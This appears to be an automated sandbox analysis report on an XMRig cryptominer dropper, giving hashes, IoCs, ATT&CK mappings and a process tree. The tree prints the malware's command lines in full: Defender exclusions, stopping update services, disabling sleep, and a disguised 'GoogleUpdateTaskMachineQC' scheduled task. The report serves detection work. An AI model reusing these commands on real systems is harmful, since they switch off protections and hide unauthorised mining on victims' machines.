xmrig | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

Analysis

max time kernel
307s
max time network
314s
platform
windows7_x64
resource
win7-20231020-en
resource tags

arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
submitted
01/11/2023, 05:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

latestX.exe
Size

5.6MB
MD5

bae29e49e8190bfbbf0d77ffab8de59d
SHA1

4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256

f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512

9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
SSDEEP

49152:MMcDmMRlBdzs3EThgR0uEqBXLdcJAbtNmbOHaGhEospqOziZXAfrrARS7JL2ozPX:dcdrCET8XeospuZXAf0EJyocDKIVDT05

Score

10^/10

xmrig evasion miner

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 1568 created 1280	1568	latestX.exe	17
PID 1568 created 1280	1568	latestX.exe	17
PID 1568 created 1280	1568	latestX.exe	17
PID 1568 created 1280	1568	latestX.exe	17
PID 1568 created 1280	1568	latestX.exe	17
PID 2964 created 1280	2964	updater.exe	17
PID 2964 created 1280	2964	updater.exe	17
PID 2964 created 1280	2964	updater.exe	17
PID 2964 created 1280	2964	updater.exe	17
PID 2964 created 1280	2964	updater.exe	17
PID 2964 created 1280	2964	updater.exe	17

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 23 IoCs

miner

resource	yara_rule
behavioral1/memory/2964-57-0x000000013FB20000-0x00000001400C1000-memory.dmp	xmrig
behavioral1/memory/2092-61-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-64-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-66-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-68-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-70-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-72-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-74-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-76-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-78-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-80-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-82-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-84-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-86-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-88-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-90-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-92-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-94-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-96-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-98-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-100-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-102-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2092-104-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 1 IoCs

pid	Process
2964	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
296	taskeng.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2964 set thread context of 1732	2964	updater.exe	69
PID 2964 set thread context of 2092	2964	updater.exe	70

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2956	sc.exe
2280	sc.exe
2660	sc.exe
2952	sc.exe
2928	sc.exe
2924	sc.exe
3008	sc.exe
2888	sc.exe
2864	sc.exe
2808	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1088	schtasks.exe
2464	schtasks.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0f9c548860cda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CRLs	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1568	latestX.exe
1568	latestX.exe
2776	powershell.exe
1568	latestX.exe
1568	latestX.exe
1568	latestX.exe
1568	latestX.exe
1568	latestX.exe
1568	latestX.exe
2684	powershell.exe
1568	latestX.exe
1568	latestX.exe
2964	updater.exe
2964	updater.exe
1384	powershell.exe
2964	updater.exe
2964	updater.exe
2964	updater.exe
2964	updater.exe
2964	updater.exe
2964	updater.exe
1816	powershell.exe
2964	updater.exe
2964	updater.exe
2964	updater.exe
2964	updater.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe
2092	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeShutdownPrivilege	2604	powercfg.exe
Token: SeShutdownPrivilege	1432	powercfg.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeShutdownPrivilege	1368	powercfg.exe
Token: SeShutdownPrivilege	2552	powercfg.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeShutdownPrivilege	1176	powercfg.exe
Token: SeShutdownPrivilege	1172	powercfg.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeShutdownPrivilege	2612	powercfg.exe
Token: SeShutdownPrivilege	2804	powercfg.exe
Token: SeDebugPrivilege	2964	updater.exe
Token: SeLockMemoryPrivilege	2092	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2752 wrote to memory of 3008	2752	cmd.exe	33
PID 2752 wrote to memory of 3008	2752	cmd.exe	33
PID 2752 wrote to memory of 3008	2752	cmd.exe	33
PID 2752 wrote to memory of 2888	2752	cmd.exe	34
PID 2752 wrote to memory of 2888	2752	cmd.exe	34
PID 2752 wrote to memory of 2888	2752	cmd.exe	34
PID 2752 wrote to memory of 2864	2752	cmd.exe	35
PID 2752 wrote to memory of 2864	2752	cmd.exe	35
PID 2752 wrote to memory of 2864	2752	cmd.exe	35
PID 2752 wrote to memory of 2956	2752	cmd.exe	36
PID 2752 wrote to memory of 2956	2752	cmd.exe	36
PID 2752 wrote to memory of 2956	2752	cmd.exe	36
PID 2752 wrote to memory of 2280	2752	cmd.exe	37
PID 2752 wrote to memory of 2280	2752	cmd.exe	37
PID 2752 wrote to memory of 2280	2752	cmd.exe	37
PID 2736 wrote to memory of 2604	2736	cmd.exe	42
PID 2736 wrote to memory of 2604	2736	cmd.exe	42
PID 2736 wrote to memory of 2604	2736	cmd.exe	42
PID 2736 wrote to memory of 1432	2736	cmd.exe	43
PID 2736 wrote to memory of 1432	2736	cmd.exe	43
PID 2736 wrote to memory of 1432	2736	cmd.exe	43
PID 2736 wrote to memory of 1368	2736	cmd.exe	44
PID 2736 wrote to memory of 1368	2736	cmd.exe	44
PID 2736 wrote to memory of 1368	2736	cmd.exe	44
PID 2736 wrote to memory of 2552	2736	cmd.exe	45
PID 2736 wrote to memory of 2552	2736	cmd.exe	45
PID 2736 wrote to memory of 2552	2736	cmd.exe	45
PID 2684 wrote to memory of 1088	2684	powershell.exe	46
PID 2684 wrote to memory of 1088	2684	powershell.exe	46
PID 2684 wrote to memory of 1088	2684	powershell.exe	46
PID 296 wrote to memory of 2964	296	taskeng.exe	50
PID 296 wrote to memory of 2964	296	taskeng.exe	50
PID 296 wrote to memory of 2964	296	taskeng.exe	50
PID 2844 wrote to memory of 2808	2844	cmd.exe	55
PID 2844 wrote to memory of 2808	2844	cmd.exe	55
PID 2844 wrote to memory of 2808	2844	cmd.exe	55
PID 2844 wrote to memory of 2928	2844	cmd.exe	56
PID 2844 wrote to memory of 2928	2844	cmd.exe	56
PID 2844 wrote to memory of 2928	2844	cmd.exe	56
PID 2844 wrote to memory of 2660	2844	cmd.exe	57
PID 2844 wrote to memory of 2660	2844	cmd.exe	57
PID 2844 wrote to memory of 2660	2844	cmd.exe	57
PID 2844 wrote to memory of 2952	2844	cmd.exe	58
PID 2844 wrote to memory of 2952	2844	cmd.exe	58
PID 2844 wrote to memory of 2952	2844	cmd.exe	58
PID 2844 wrote to memory of 2924	2844	cmd.exe	59
PID 2844 wrote to memory of 2924	2844	cmd.exe	59
PID 2844 wrote to memory of 2924	2844	cmd.exe	59
PID 2900 wrote to memory of 1176	2900	cmd.exe	64
PID 2900 wrote to memory of 1176	2900	cmd.exe	64
PID 2900 wrote to memory of 1176	2900	cmd.exe	64
PID 2900 wrote to memory of 1172	2900	cmd.exe	65
PID 2900 wrote to memory of 1172	2900	cmd.exe	65
PID 2900 wrote to memory of 1172	2900	cmd.exe	65
PID 2900 wrote to memory of 2612	2900	cmd.exe	66
PID 2900 wrote to memory of 2612	2900	cmd.exe	66
PID 2900 wrote to memory of 2612	2900	cmd.exe	66
PID 2900 wrote to memory of 2804	2900	cmd.exe	68
PID 2900 wrote to memory of 2804	2900	cmd.exe	68
PID 2900 wrote to memory of 2804	2900	cmd.exe	68
PID 1816 wrote to memory of 2464	1816	powershell.exe	67
PID 1816 wrote to memory of 2464	1816	powershell.exe	67
PID 1816 wrote to memory of 2464	1816	powershell.exe	67
PID 2964 wrote to memory of 1732	2964	updater.exe	69

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1280
- C:\Users\Admin\AppData\Local\Temp\latestX.exe
  "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3008
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2888
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2864
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2956
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2280
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1432
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1368
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1088
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:2808
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2928
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2660
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2952
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2924
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2464
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1732
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2092

C:\Windows\system32\taskeng.exe
taskeng.exe {17C97B1E-E2BF-431C-B13C-EECF3B0780C2} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:296
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
5.6MB

MD5
bae29e49e8190bfbbf0d77ffab8de59d

SHA1
4a6352bb47c7e1666a60c76f9b17ca4707872bd9

SHA256
f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

SHA512
9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
5.6MB

MD5
bae29e49e8190bfbbf0d77ffab8de59d

SHA1
4a6352bb47c7e1666a60c76f9b17ca4707872bd9

SHA256
f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

SHA512
9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7c437ff8e350381dc4caf15eb1aa12d9

SHA1
10732c075b7bc3c1c3541131dcc3bd314822bb6e

SHA256
cd7e56efdbe646810319dedc1afbc55f24acc2d04bf993527ee10aa400828565

SHA512
bcb9a2e39aff385def38aa6d4f292c33d66170b5f761b3f2aa7307f42e47fcf0b6d231ef26d58de60750e69bfc54a5c6eb622e30e886351a0ad28099a6a07862

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MH93C03991J6IWESM4N9.temp

Filesize
7KB

MD5
7c437ff8e350381dc4caf15eb1aa12d9

SHA1
10732c075b7bc3c1c3541131dcc3bd314822bb6e

SHA256
cd7e56efdbe646810319dedc1afbc55f24acc2d04bf993527ee10aa400828565

SHA512
bcb9a2e39aff385def38aa6d4f292c33d66170b5f761b3f2aa7307f42e47fcf0b6d231ef26d58de60750e69bfc54a5c6eb622e30e886351a0ad28099a6a07862

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
3e9af076957c5b2f9c9ce5ec994bea05

SHA1
a8c7326f6bceffaeed1c2bb8d7165e56497965fe

SHA256
e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

SHA512
933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
5.6MB

MD5
bae29e49e8190bfbbf0d77ffab8de59d

SHA1
4a6352bb47c7e1666a60c76f9b17ca4707872bd9

SHA256
f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87

SHA512
9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

Download Submit
memory/1384-39-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/1384-38-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-40-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-44-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/1384-43-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/1384-42-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/1384-41-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/1568-29-0x000000013F4A0000-0x000000013FA41000-memory.dmp

Filesize
5.6MB

Download
memory/1568-0-0x000000013F4A0000-0x000000013FA41000-memory.dmp

Filesize
5.6MB

Download
memory/1732-69-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1732-60-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1816-51-0x0000000001050000-0x00000000010D0000-memory.dmp

Filesize
512KB

Download
memory/1816-48-0x0000000001050000-0x00000000010D0000-memory.dmp

Filesize
512KB

Download
memory/1816-49-0x0000000001050000-0x00000000010D0000-memory.dmp

Filesize
512KB

Download
memory/1816-47-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/1816-50-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/1816-52-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2092-68-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-82-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-104-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-102-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-100-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-98-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-96-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-94-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-92-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-90-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-88-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-86-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-84-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-80-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-78-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-58-0x0000000000040000-0x0000000000060000-memory.dmp

Filesize
128KB

Download
memory/2092-76-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-59-0x0000000000540000-0x0000000000560000-memory.dmp

Filesize
128KB

Download
memory/2092-74-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-61-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-62-0x0000000000540000-0x0000000000560000-memory.dmp

Filesize
128KB

Download
memory/2092-64-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-66-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-72-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2092-70-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2684-20-0x000000001B0B0000-0x000000001B392000-memory.dmp

Filesize
2.9MB

Download
memory/2684-27-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-26-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2684-25-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2684-24-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-22-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

Filesize
9.6MB

Download
memory/2684-23-0x0000000002430000-0x00000000024B0000-memory.dmp

Filesize
512KB

Download
memory/2684-21-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/2776-10-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2776-13-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
512KB

Download
memory/2776-12-0x00000000024E4000-0x00000000024E7000-memory.dmp

Filesize
12KB

Download
memory/2776-11-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
512KB

Download
memory/2776-7-0x000000001B090000-0x000000001B372000-memory.dmp

Filesize
2.9MB

Download
memory/2776-9-0x000007FEF5340000-0x000007FEF5CDD000-memory.dmp

Filesize
9.6MB

Download
memory/2776-8-0x0000000001E90000-0x0000000001E98000-memory.dmp

Filesize
32KB

Download
memory/2776-33-0x00000000024E0000-0x0000000002560000-memory.dmp

Filesize
